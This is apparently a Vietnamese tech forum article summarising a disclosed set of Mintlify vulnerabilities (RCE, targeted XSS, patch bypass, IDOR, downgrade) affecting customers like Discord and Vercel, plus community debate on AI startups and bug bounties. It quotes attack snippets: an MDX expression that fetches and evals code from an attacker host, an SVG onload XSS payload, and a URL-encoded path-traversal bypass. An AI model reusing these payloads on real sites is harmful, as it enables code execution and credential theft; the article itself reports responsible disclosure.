Lỗ Hổng Bảo Mật Mintlify: Hacker có thể tấn công Discord, Twitter, Vercel... chỉ bằng một thủ thuật đơn giản

VNZ-TECHS
Trong bối cảnh công nghệ năm 2025, khi các startup AI phát triển chóng mặt nhờ vốn đầu tư mạo hiểm (VC), một vụ việc bảo mật nghiêm trọng tại Mintlify đã trở thành biểu tượng cho những rủi ro tiềm ẩn. Mintlify, một nền tảng SaaS B2B chuyên cung cấp dịch vụ tài liệu hóa code qua MDX (kết hợp Markdown và JSX), đã bị các nhà nghiên cứu bảo mật trẻ tuổi bao gồm Eva'site ( tạm gọi là Eva), hackermon và mdl, họ đã phát hiện hàng loạt lỗ hổng nghiêm trọng. Những lỗ hổng này không chỉ ảnh hưởng đến Mintlify mà còn lan rộng qua chuỗi cung ứng, đe dọa hàng triệu người dùng của các khách hàng lớn như Discord, Twitter (nay là X), Vercel, Cursor và nhiều công ty Fortune 500 khác. Đây là minh chứng cho sự thiếu chín chắn trong phát triển phần mềm thời đại AI. Bài viết này tổng hợp chi tiết từ báo cáo của các researcher và các ý kiến thảo luận trên cộng đồng mạng, nhằm làm rõ sự việc và rút ra bài học.

hacker-Mintlify1.jpg

Khởi Đầu Của Cuộc "Kiểm Thử Bảo Mật Ngẫu Hứng"​


Sự việc bắt đầu khi nhà nghiên cứu bảo mật trẻ tuổi Eva nhận thấy Discord chuyển sang sử dụng Mintlify để host tài liệu. Là một công ty từng được Eva xem xét trước đây, Mintlify nay đã lớn mạnh với danh sách khách hàng ấn tượng như : Discord, Twitter, Vercel, Cursor và hàng trăm tên tuổi khác (danh sách đầy đủ có thể xem tại trang của Mintlify). Nền tảng này cho phép doanh nghiệp tải lên file MDX, host và thêm tính năng AI, nhưng chính sự phức tạp này đã mở ra cửa ngõ cho các lỗ hổng.


Eva, cùng với hackermon và mdl (các bài viết chi tiết của họ có tại liên kết tương ứng), đã đăng ký tài khoản và bắt đầu "đào bới". Họ nhanh chóng phát hiện ra một lỗ hổng RCE (Remote Code Execution - CVE-2025-67843) nghiêm trọng. Bằng cách chèn biểu thức JSX độc hại vào MDX, như {!!fetch("https://attacker.kibty.town").then((r) => r.text()).then((c) => eval(c))}, họ có thể thực thi code trên server-side của Mintlify – vốn chạy trên Next.js và Vercel. Kết quả? Họ trích xuất được toàn bộ biến môi trường (process.env), file hệ thống và token API, dẫn đến khả năng poison cache Next.js cho mọi site khách hàng.


Có thể thấy đây là lỗi cơ bản, tương đương việc lưu HTML thô vào database mà không sanitize. Một commenter (llmslave2) gọi Mintlify là "vibe-coded" startup dựa trên hype AI mà thiếu kỹ thuật thực thụ, với kiến trúc cache "ấn tượng" chỉ là bề nổi. Các khách hàng lớn không vetting bảo mật kỹ lưỡng, dẫn đến rủi ro lan rộng.


Các Lỗ Hổng Chính Và Tác Động​


Báo cáo của Eva chi tiết hóa nhiều lỗ hổng:

  1. RCE (CVE-2025-67843): Cho phép thực thi code server-side, poison cache toàn cầu, dẫn đến mass XSS, defacing site, hoặc giả mạo trang không tồn tại cho targeted XSS. Với token API, kẻ tấn công có thể làm hỏng analytics, feature flagging, DoS site khách hàng, hoặc tăng bill cloud (qua export PDF hàng loạt).
    Anh-man-hinh-2025-12-19-luc-11.14.07.jpg
  2. Targeted XSS (CVE-2025-67842): Qua route /_mintlify/static/[subdomain]/{...path}, kẻ tấn công upload file SVG chứa script độc (như <svg onload="alert(window.origin);"/>) lên repo của mình, rồi truy cập từ domain khách hàng (ví dụ: https://discord.com/_mintlify/static/evascoolcompany/xss.svg). Điều này cho phép 1-click XSS, trích xuất token từ localStorage – đặc biệt nguy hiểm với các site không scope cookie đúng (như Discord tại /developers/docs, Twitter, Vercel, Cursor).
    Anh-man-hinh-2025-12-19-luc-11.17.41.jpg
  3. Patch Bypass (CVE-2025-67845): Sau khi Mintlify vá XSS bằng cách giới hạn asset theo organization, Eva phát hiện bypass qua path traversal URL-encoded (ví dụ: .../create-team-owned-app.png%2F..%2F..%2F..%2Fevascoolcompany%2Fxss.svg). Lỗi này xuất phát từ việc không encode path đúng cách.
  4. Các Lỗ Hổng Phụ:
    • GitHub IDOR (CVE-2025-67844): Không validate repo owner, cho phép xem commit chi tiết của repo khác.
    • Downgrade Attack (CVE-2025-67846): Sử dụng deployment cũ trên Vercel để khai thác lỗ hổng đã vá.

Tác động tổng thể: Supply-chain attack quy mô lớn, ảnh hưởng Fortune 500. Hacker có thể deface docs, XSS mass/targeted, xem/push commit repo, hoặc chiếm quyền user. Nhưng điều lo ngại ở đây là các startup AI lạm dụng gen-AI cho code dễ mắc lỗi cơ bản, và phần thưởng bounty thấp (5.000 USD từ Mintlify, tổng ~11.000 USD) khuyến khích hacker không báo cáo mà khai thác ngầm (subscribed: "Not with 5k bounty for THAT").


Phản Ứng Từ Cộng Đồng Và Bài Học​

Câu chuyện Mintlify nhanh chóng tạo ra nhiều tranh luận trong cộng đồng kỹ thuật. Có người thẳng thắn nhận xét đây đúng là “tất cả những gì họ ghét ở công nghệ hiện đại”: một startup được VC rót vốn, tăng trưởng nhanh, marketing tốt, có khách hàng lớn nhưng phần cốt lõi về bảo mật lại rất mong manh. Nhiều doanh nghiệp lớn dường như đã tin tưởng nền tảng này mà không thực hiện đánh giá bảo mật đầy đủ, để rồi chỉ một lỗ hổng cũng có thể gây ảnh hưởng dây chuyền đến hàng loạt hệ thống khác.

Một số ý kiến phản biện cho rằng “sản phẩm lớn nào rồi cũng từng bị hack”, nhưng quan điểm này không thuyết phục được giới làm bảo mật. Vấn đề không nằm ở việc có lỗ hổng hay không, mà ở cách tổ chức thiết kế hệ thống phòng thủ. Một hệ thống chuyên nghiệp không nên dựa vào blacklist vá lỗi kiểu đối phó, mà phải dùng whitelist và nhiều lớp kiểm soát độc lập, theo mô hình “swiss cheese”, để một sai sót cá nhân không thể kéo sập cả hệ thống. Chính sự thiếu vắng các lớp phòng vệ này mới là điều khiến cộng đồng lo ngại.

Nhiều người cũng đặt câu hỏi: vì sao một sản phẩm về bản chất khá đơn giản, gần giống một static site generator kèm hosting, lại có thể thu hút nhiều khách hàng lớn đến vậy? Câu trả lời được nhắc đến khá nhiều là sự tiện lợi, cộng với tâm lý “trả tiền thì chắc là tốt”, và niềm tin vào thương hiệu đứng sau các quỹ đầu tư hoặc hệ sinh thái startup nổi tiếng.

Ở góc độ tích cực, Eva và các cộng sự đã chủ động liên hệ Mintlify để công bố có trách nhiệm các lỗ hổng. Phía Mintlify cũng phản hồi khá nhanh, vá lỗi RCE bằng cách không còn parse các biểu thức MDX phức tạp ở server-side, chỉ xử lý ở phía client. Các vấn đề XSS được xử lý bằng cách giới hạn truy cập asset theo từng tổ chức và bổ sung kiểm tra path traversal. Lỗ hổng IDOR được khắc phục bằng việc xác thực quyền truy cập repository, còn nguy cơ downgrade attack thì được giảm thiểu bằng cách đặt mật khẩu cho preview deployment và dọn dẹp các bản deploy cũ.

Dù vậy, điều khiến nhiều lập trình viên và sysadmin thực sự lo lắng không chỉ nằm ở các bản vá. Nỗi sợ lớn hơn là không phải mọi lỗ hổng đều sẽ được báo cáo, nhất là khi mức bug bounty không tương xứng với rủi ro. Câu chuyện này một lần nữa củng cố suy nghĩ ngày càng phổ biến trong giới kỹ thuật: chúng ta buộc phải thận trọng hơn, tin ít phần mềm hơn, và không nên mặc định rằng một dịch vụ SaaS “có tiếng” thì đồng nghĩa với an toàn.


Vụ Mintlify là lời cảnh tỉnh cho ngành công nghệ: Hype AI và tăng trưởng nhanh không thay thế được bảo mật vững chắc. Các startup cần ưu tiên audit code, whitelist security, và bounty hợp lý để khuyến khích responsible disclosure. Đối với doanh nghiệp, vetting vendor kỹ lưỡng là bắt buộc, đặc biệt với supply-chain. May mắn thay, nhờ Eva, hackermon và mdl, lỗ hổng được vá trước khi bị khai thác rộng rãi. Nhưng như HN nhận định, đây chỉ là "một trong nhiều" các công ty AI khác có thể là mục tiêu tiếp theo. Để biết thêm, hãy đọc báo cáo gốc của các researcher.


Vn-Z.vn team tổng hợp tham khảo nguồn Eva
 
Trả lời

VNZ-TECHS

Administrator
Thông tin của hacker mũ trắng trên Github
hi, i'm daniel. i'm a 16-year-old high school senior. in my free time, i hack billion dollar companies and build cool stuff.


about a month ago, a couple of friends and I found serious critical vulnerabilities on Mintlify, an AI documentation platform used by some of the top companies in the world.


i found a critical cross-site scripting vulnerability that, if abused, would let an attacker to inject malicious scripts into the documentation of numerous companies and steal credentials from users with a single link open.


(go read my friends' writeups (after this one))
how to hack discord, vercel, and more with one easy trick (eva)
Redacted by Counsel: A supply chain postmortem (MDL)